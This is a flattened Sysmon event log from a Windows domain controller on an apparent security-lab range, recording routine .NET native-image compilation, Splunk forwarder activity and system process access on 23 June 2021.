21:02:55.069{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.054{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.054{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.827{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1EE506BB9DA5CC7A3C64B2B5A08634F,SHA256=0EFEB4F6F0BFF9C29F679F5DCB696EA59B53D52560EE6EB28CEA1BFDFE114C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:58.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.970{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A8B9BECB2EB242D6793BA2C414012CE,SHA256=2F2761AA2D431C8112BD37AF2D4BB89FA49F8C005A7FEFE95C1AADA4685EB2F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:59.827{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.672{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C262C23091B0F245AB18BD3A3C10D5,SHA256=6239DECB4B78E37C21BD629086295782A5A08E95AB7668D51DD0CAC2E1F54CF7,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000019932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:59.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.437{4DB9351A-A181-60D3-2103-00000000CF01}7036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SFAE3EP180\System.Runtime.Serialization.ni.dll.auxMD5=3D84DB165ECCE73AE3BD3D388DF02345,SHA256=CA86DF1C03C0304B4956A0EDE7A597A323936886ED8927D1E4D2869EE1CBD1A4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.437{4DB9351A-A181-60D3-2103-00000000CF01}7036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SFAE3EP180\System.Runtime.Serialization.ni.dllMD5=B17184CBA4F7BA09DAA13DE7947AFAB7,SHA256=61FE390E5BC862993C2D101BACB76CB487DC9C161B3A0AF08EFAC87EA2E4776C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:59.359{4DB9351A-A181-60D3-2103-00000000CF01}7036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b7c-0\System.Runtime.Serialization.dll2021-06-23 21:02:59.359 23542300x800000000000000019948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DF6EA952F0A1920501F14F6C665F38,SHA256=FB1AABEB6D7247B65E2357D50AB5A873248AC583093CF6F7E6EB0E673C38243B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.531{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12DEB75FDA6303E5F7CC9574DB369115,SHA256=EF90ADB6278B2F309ECD2FEB534F37F0DAE2C87ACD060088EAB4C751889B3911,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.115{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61403-false10.0.1.12-8000- 10341000x800000000000000019945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.437{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:00.437{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
